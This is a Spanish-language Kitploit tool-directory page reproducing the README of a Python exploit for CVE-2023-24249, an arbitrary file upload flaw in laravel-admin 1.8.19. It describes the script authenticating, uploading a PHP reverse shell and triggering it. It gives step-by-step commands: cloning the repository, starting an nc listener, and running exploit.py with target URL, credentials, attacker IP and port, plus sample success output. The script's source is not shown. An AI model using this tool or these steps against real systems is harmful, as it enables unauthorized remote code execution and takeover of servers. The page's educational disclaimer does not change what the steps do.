Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-24249-Exploit — Script de exploit para CVE-2023-24249: una vulnerabilidad que permite la ejecución remota de código mediante la carga de archivos y la inyección de comandos. | Kitploit
Herramientas/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubiduzzel/cve-2023-24249-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-24249-Exploit

Script de exploit para CVE-2023-24249: una vulnerabilidad que permite la ejecución remota de código mediante la carga de archivos y la inyección de comandos.

Ver Repositorio
91hace 2 añosAún no revisado

Script de explotación CVE-2023-24249

Descripción

Este repositorio contiene un script de explotación para CVE-2023-24249, una vulnerabilidad crítica encontrada en laravel-admin versión 1.8.19. Esta vulnerabilidad permite la carga arbitraria de archivos, lo que permite a los atacantes ejecutar código arbitrario mediante un archivo PHP manipulado. El exploit demuestra cómo un atacante puede subir una reverse shell a la aplicación objetivo y ejecutarla para obtener acceso remoto.

Detalles de la vulnerabilidad

CVE-2023-24249 es una vulnerabilidad de carga arbitraria de archivos en laravel-admin v1.8.19. Esta vulnerabilidad permite a los atacantes subir y ejecutar archivos PHP arbitrarios, lo que puede conducir a una ejecución remota de código.

  • Puntuación base: 7.2 HIGH
  • Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Enumeración de debilidades: CWE-434 - Carga sin restricciones de archivos con tipo peligroso

Referencias

  • Exploit - Aviso de terceros
  • Repositorio de Laravel Admin en GitHub
  • Sitio web oficial de Laravel Admin

Script de explotación

El script de explotación proporcionado automatiza el proceso de explotación de CVE-2023-24249. Realiza los siguientes pasos:

  1. Autenticarse: Inicia sesión en la aplicación objetivo utilizando las credenciales proporcionadas.
  2. Subir reverse shell: Sube un script de reverse shell PHP a través de la funcionalidad vulnerable de carga de archivos.
  3. Ejecutar reverse shell: Envía una solicitud GET al script de reverse shell subido para ejecutarlo y establecer una conexión de vuelta a la máquina del atacante.

Requisitos

  • Python 3
  • Biblioteca requests
  • Biblioteca beautifulsoup4

Instale las bibliotecas requeridas usando pip:

root@kitploit:~
pip install requests beautifulsoup4

Uso

  1. Clonar el repositorio:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. Iniciar un listener en su máquina:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. Ejecutar el script de explotación:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    Reemplace <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> y <YOUR_PORT> con los valores adecuados:

    • <TARGET_URL>: La URL de la aplicación objetivo.
    • <USERNAME>: El nombre de usuario para la autenticación.
    • <PASSWORD>: La contraseña para la autenticación.

Ejemplo

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

Salida del script

Si el exploit tiene éxito, el script mostrará:

root@kitploit:~
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

Aviso legal

Este script está destinado únicamente a fines educativos. El uso no autorizado de este script contra cualquier sistema sin permiso explícito es ilegal y poco ético. El autor no es responsable de ningún uso indebido o daño causado por este script.

Descargar herramienta
  • <YOUR_IP>: Su dirección IP para recibir la conexión reverse shell.
  • <YOUR_PORT>: El puerto en el que se está ejecutando su listener.